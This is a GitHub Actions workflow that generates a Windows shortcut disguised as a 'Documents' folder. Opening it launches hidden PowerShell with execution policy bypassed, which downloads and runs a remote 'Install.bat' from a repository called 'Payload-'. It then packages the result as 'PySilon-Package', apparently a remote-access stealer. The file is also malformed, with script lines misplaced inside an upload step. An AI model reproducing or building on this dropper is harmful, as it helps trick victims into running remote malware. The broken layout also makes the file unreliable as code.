name: Generate LNK Only
on: [workflow_dispatch]

jobs:
  build:
    runs-on: windows-latest
    steps:
      - name: Create Stealth Folder Shortcut
        shell: pwsh
        run: |
          $WshShell = New-Object -ComObject WScript.Shell
          # Creating the shortcut on the root for easy find
          $Shortcut = $WshShell.CreateShortcut("$pwd\Documents.lnk")
          
          # Engine: PowerShell
          $Shortcut.TargetPath = "powershell.exe"
          
          # Command: Runs your .bat from GitHub
          $Shortcut.Arguments = "-w h -ep bypass -c IEX(iwr 'https://raw.githubusercontent.com/Wizardcargo8080/Payload-/main/Install.bat').Content"
          
          # Icon: Yellow Folder (shell32 index 3)
          $Shortcut.IconLocation = "C:\Windows\System32\shell32.dll, 3"
          
          # Style: Minimized
          $Shortcut.WindowStyle = 7
          $Shortcut.Save()

      - name: Upload Shortcut
        uses: actions/upload-artifact@v4
        with:
          name: Folder-Shortcut
          path: "*.lnk"
          # We use single quotes inside the double quotes to prevent errors
          $Shortcut.Arguments = "-w h -ExecutionPolicy Bypass -Command IEX(iwr 'https://raw.githubusercontent.com/Wizardcargo8080/Payload-/main/Install.bat').Content"
          $Shortcut.IconLocation = "C:\Windows\System32\shell32.dll, 3"
          $Shortcut.WindowStyle = 7
          $Shortcut.Save()

      - name: Upload Result
        uses: actions/upload-artifact@v4
        with:
          name: PySilon-Package
          path: |
            dist/*.exe
            dist/*.lnk
 
